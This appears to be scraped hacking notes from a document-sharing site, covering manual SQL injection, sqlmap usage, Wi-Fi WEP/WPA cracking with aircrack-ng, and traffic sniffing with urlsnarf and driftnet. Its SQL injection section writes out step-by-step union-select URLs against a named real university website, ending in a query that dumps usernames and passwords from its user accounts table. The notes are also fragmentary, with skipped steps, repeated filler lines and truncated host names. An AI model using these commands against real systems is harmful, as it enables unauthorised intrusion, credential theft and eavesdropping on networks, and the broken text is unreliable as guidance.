Professional Documents
Culture Documents
SQL CMD
SQL CMD
~~~~~~~~~~~~~~~~~~~
Functions
database() || for finding the database name
version() || for finding the version of the db
user() || for finding the root user of the db
group_concat() || for make the collection of the different things
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from
information_schema.table_constraints-- -
Step 6: Now finding the columns
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from
information_schema.columns where table_name='useraccounts'-- -
uname,upassword
0x3a=:
http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from
useraccounts-- -
SQL Map
Assuming shu.co.in/lol.php?id=50
check if the site is vulernable or not
Step 1: sqlmap.py -u s.in/lol.php?id=50 --dbs //to find the database
assume database name is sh
alternative
or
Assuming sh.co.in/lol.php?id=50
check if the site is vulernable or not
alternative
or
Assuming .co.in/lol.php?id=50
check if the site is vulernable or not
Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the database
assume database name is sh
alternative
or
Wireless hacking
WI-FI
~~~~
~what is wi-fi?
~what is guided medium?
data base is transfer which is guided by wire.
~what is unguided meduim?
data is transfered with unguided(air) meduim.
WEP
~~~
wireless equivalent privacy
airmon,airodump,aireplay,aircrack
WEP-CRACKING
~~~~~~~~~~
WPA
~~~
1-6 same
STEP:7->aircrack-ng -w dc.txt shubham-01.cap
if the error comes and then use
--ignore-negative-one
Step 3 : urlsnarf
ex urlsnarf -i wlan0
ex urlsnarf //for lan(eth0 port)
step 4 : driftnet
ex driftnet -i wlan0
ex driftnet // for lan(eth0 port)